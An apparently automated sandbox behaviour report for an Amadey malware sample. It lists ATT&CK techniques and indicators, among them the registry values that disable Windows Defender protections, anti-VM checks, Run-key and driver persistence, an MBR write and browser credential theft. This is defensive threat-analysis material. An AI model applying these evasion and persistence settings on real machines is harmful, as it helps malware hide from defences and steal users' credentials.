amadey | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	8c1aa1e31d.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	8c1aa1e31d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	8c1aa1e31d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	8c1aa1e31d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	8c1aa1e31d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	8c1aa1e31d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	8c1aa1e31d.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	8c1aa1e31d.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	8c1aa1e31d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	8c1aa1e31d.exe

Modifies security service 2 TTPs 2 IoCs

Modify Registry

Windows Service

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5fa1f2042d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5d92038cff.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8c1aa1e31d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
126	7332	powershell.exe
131	9608	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4056	powershell.exe
8712	powershell.exe
9068	powershell.exe
5376	powershell.exe
7332	powershell.exe
9608	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 12 IoCs

flow	pid	Process
126	7332	powershell.exe
131	9608	powershell.exe
35	2820	svchost.exe
279	2140	rapes.exe
279	2140	rapes.exe
39	2140	rapes.exe
66	2140	rapes.exe
129	2140	rapes.exe
129	2140	rapes.exe
150	2140	rapes.exe
27	2140	rapes.exe
29	2140	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\klupd_b296ad91a_arkmon.sys	0047102a.exe
File created	C:\Windows\System32\Drivers\klupd_b296ad91a_klbg.sys	0047102a.exe
File created	C:\Windows\System32\Drivers\b296ad91.sys	0047102a.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
5372	icacls.exe
3236	takeown.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_mark\ImagePath = "System32\\Drivers\\klupd_b296ad91a_mark.sys"	0047102a.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b296ad91a_arkmon.sys"	0047102a.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\l8j127_5044\ImagePath = "\\??\\C:\\Windows\\Temp\\I2Eo5CE_5044.sys"	tzutil.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b296ad91\ImagePath = "System32\\Drivers\\b296ad91.sys"	0047102a.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_arkmon\ImagePath = "System32\\Drivers\\klupd_b296ad91a_arkmon.sys"	0047102a.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_klbg\ImagePath = "System32\\Drivers\\klupd_b296ad91a_klbg.sys"	0047102a.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_klark\ImagePath = "System32\\Drivers\\klupd_b296ad91a_klark.sys"	0047102a.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5d92038cff.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8c1aa1e31d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5fa1f2042d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5d92038cff.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8c1aa1e31d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5fa1f2042d.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe

Deletes itself 1 IoCs

pid	Process
448	w32tm.exe

Executes dropped EXE 24 IoCs

pid	Process
2140	rapes.exe
1300	apple.exe
2164	11.exe
2644	11.exe
4308	f73ae_003.exe
4688	7IIl2eE.exe
5044	tzutil.exe
448	w32tm.exe
6344	rapes.exe
2416	d3d6a21859.exe
8364	TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
10056	73ed0fd0bf.exe
10384	483d2fa8a0d53818306efeb32d3.exe
10864	5d92038cff.exe
11588	2dadc4a98b.exe
11668	13d55a37.exe
12524	0047102a.exe
9680	8c1aa1e31d.exe
12528	f73ae_003.exe
13148	7IIl2eE.exe
3164	rapes.exe
10476	Passwords.com
10896	5fa1f2042d.exe
11376	svchost015.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	5d92038cff.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	5fa1f2042d.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	8c1aa1e31d.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

Safe Mode Boot

T1562.009

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b296ad91.sys\ = "Driver"	0047102a.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b296ad91.sys	0047102a.exe

Loads dropped DLL 25 IoCs

pid	Process
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5372	icacls.exe
3236	takeown.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	8c1aa1e31d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	8c1aa1e31d.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5d92038cff.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338170101\\5d92038cff.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2dadc4a98b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338190101\\2dadc4a98b.exe"	rapes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\10dd3fc6-07a0-4820-9bca-e26890894176 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{9a2f393d-501c-4987-9938-c3239f67d234}\\10dd3fc6-07a0-4820-9bca-e26890894176.cmd\""	0047102a.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8c1aa1e31d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338200101\\8c1aa1e31d.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d3d6a21859.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338040101\\d3d6a21859.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338050121\\am_no.cmd"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Documents\desktop.ini	firefox.exe
File opened for modification	C:\Users\Public\desktop.ini	firefox.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	firefox.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	0047102a.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	0047102a.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0005000000009f92-32244.dat	autoit_exe
behavioral2/files/0x000500000001ed50-32444.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
9420	tasklist.exe
9832	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
3932	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
2140	rapes.exe
6344	rapes.exe
8364	TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
10384	483d2fa8a0d53818306efeb32d3.exe
10864	5d92038cff.exe
9680	8c1aa1e31d.exe
3164	rapes.exe
10896	5fa1f2042d.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 10056 set thread context of 10188	10056	73ed0fd0bf.exe	214
PID 10896 set thread context of 11376	10896	5fa1f2042d.exe	262

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	13d55a37.exe
File opened (read-only)	\??\VBoxMiniRdrDN	0047102a.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe

Drops file in Windows directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5248	sc.exe
1992	sc.exe
3992	sc.exe
5560	sc.exe
2696	sc.exe
5388	sc.exe
2332	sc.exe
5264	sc.exe
3052	sc.exe
5380	sc.exe
5288	sc.exe
2812	sc.exe
4112	sc.exe
2136	sc.exe
1592	sc.exe
4052	sc.exe
644	sc.exe
2496	sc.exe
6060	sc.exe
5932	sc.exe
5224	sc.exe
1296	sc.exe
3360	sc.exe
3600	sc.exe
5464	sc.exe
6128	sc.exe
5532	sc.exe
1904	sc.exe
3008	sc.exe
2416	sc.exe
3100	sc.exe
5588	sc.exe
2236	sc.exe
4000	sc.exe
4660	sc.exe
4012	sc.exe
5316	sc.exe
436	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	0047102a.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	0047102a.exe

System Location Discovery: System Language Discovery 1 TTPs 55 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	2dadc4a98b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5d92038cff.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	2dadc4a98b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8c1aa1e31d.exe
